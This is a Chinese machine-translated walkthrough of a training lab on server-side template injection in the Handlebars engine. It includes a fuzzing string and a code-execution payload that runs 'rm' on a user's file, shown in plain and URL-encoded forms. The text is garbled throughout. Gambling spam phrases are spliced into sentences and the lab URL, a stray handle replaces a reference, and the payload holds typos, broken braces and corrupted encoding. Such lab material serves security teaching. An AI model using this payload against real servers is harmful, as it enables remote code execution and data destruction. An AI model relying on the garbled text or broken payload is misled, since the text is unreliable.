实验室:用未知语言注入的服务器端模板注入,并有记录的利用
从业者
这个实验室很容易受到伤害服务器端模板注入。要解决实验室,请确定模板引擎并在线查找已记录的利用,您可以使用该引擎执行任意代码,然后删除Morale.txt
从卡洛斯的主目录中归档。
解决方案
- 请注意,当您尝试查看有关第一个产品的更多详细信息时
得到
请求使用信息
参数到渲染“不幸的是,该产品缺货了”
在主页上。 - 通过注入含有来自各种不同模板语言的模板语法的模糊字符串的实验,例如
$ {{<%[%'“}}%\
, 进入信息
范围。请注意,当您提交无效语法时,输出中显示了错误消息。这确定网站正在使用车把。beplay体育能用吗 - 搜索网络以获取“车把服beplay体育能用吗务器端模板注入”。您应该找到一个著名的利用。
@ZombieHelp54
。 修改此漏洞以使其调用
require(“ child_process”)。exec(“ rm/home/carlos/morale.txt”)
如下:wrtz {{#with“ s” as | string |}}} {{#with“ e”}}} {{#with split as | conslist |}}} {{this.pop}}} {this.push(lookup string)。sub“ constructor”)}}} {{{this.pop}}} {{#with string.split as | codeList |}}} {{this.pop}}} {{this.push {'rm/home/carlos/morale.txt');“}}} {{this.pop}}} {{#each conslist}}} {{#with(strign.sub.apply 0 codeList)}}}}}}}}}} {{this}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}{{/with}}} {{/enth}} {/with}}} {/with}} {/with}}} {{/with}}} {/with} {/with}}}
URL编码您的利用并将其添加为URL中消息参数的值。最终的利用应该看起来像这样,但请记住要替换
您的LAB-ID
使用您自己的实验室ID:https://your-lab-id.beplay体育能用吗web-security-academy.net/?message=wrtz%7B%7B%23%23%69%69%68%68%20%22%22%22%22%20%20%20%61%73%20%7C%73%74%72%69%6E%67%67%7C%7D%7D%0D%0A%20%20%20%7b%7b%23%77%69%74%68%20%20%22%65%22%7D%7D%0D%0A%20%20%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6C%69%69%74%20%20%61%73%20%7C%63%6F%6E%73%6C%69%73%74%7C%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%7B%7B%74%68%69%73%2E%70%6F%70%7D%7D%0D%0A%20%20%20%20%20%20%20%7B%74%74%68%69%69%73%2E%70%75%73%68%20%28%6C%6F%6F%6B%75%70%20%73%74%74%72%69%67%67%2E%73%75%75%62%20%20%22%63%63%6F%6E%73%74%72%75%63%74%6F%72%22%29%29%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%7B%7B%74%68%69%73%2E%70%6F%70%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%20%73%74%72%69%6E%67%2E%73%70%6C%69%74%20%61%73%20%7C%63%63%6F%64%65%6C%69%69%73%74%74%7C 7C%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2E%70%70%6F%70%70%7D%7D%0D%0D%0A%20%20%20%20%20%20%20%20%20%7b%74%68%69%73%73%70%75%73%68%20%20%22%72%65%74 74%75%72%6E%20%72%65%71%75%69%72%65%28%28%27%63%68%69%69%64%5F%70%72%72%6F%63%63%65%73%73%27%29%2E%65%78%65%63%28%28%27%72%6D%20%2F%68%6F%6D%6D%65%2F%63%61%61%72%6C%6C%6F%73%2F%6D%6F%72%61%6C%65%2E%74%74%74%27%29%29%22%22%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%73%2E%70%6F%70%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%7B%7b%23%65%61%63%68%20%63%63%6F%6E%73%6C%69%74%74%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%74%72%69%67%67%2E%73%75%75%62%2E%61%70%70%6C%79%20%30%20%63%63%6F%64%65%6C%69%73%74%29%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%7D%7D%0d%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7b%7b%2F%77%69%74%68%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%7B%7B%2F%65%61%63%68%7D%7D%0D%20%20%20%20%20%20%20%20%7b%7b%2F%77%69%74%68%68%7D%7D%0D%0D%0A%20%20%20%20%7b%7b%2F%77%69%74%68%7D%7D%0d%0A%20%20%20%7b%7b%2F%77%69%69%74%68%7D%7D%7D%0D%0A%7b%7b%2F%77%69%74%68%7D%7D
- 加载URL时应解决实验室。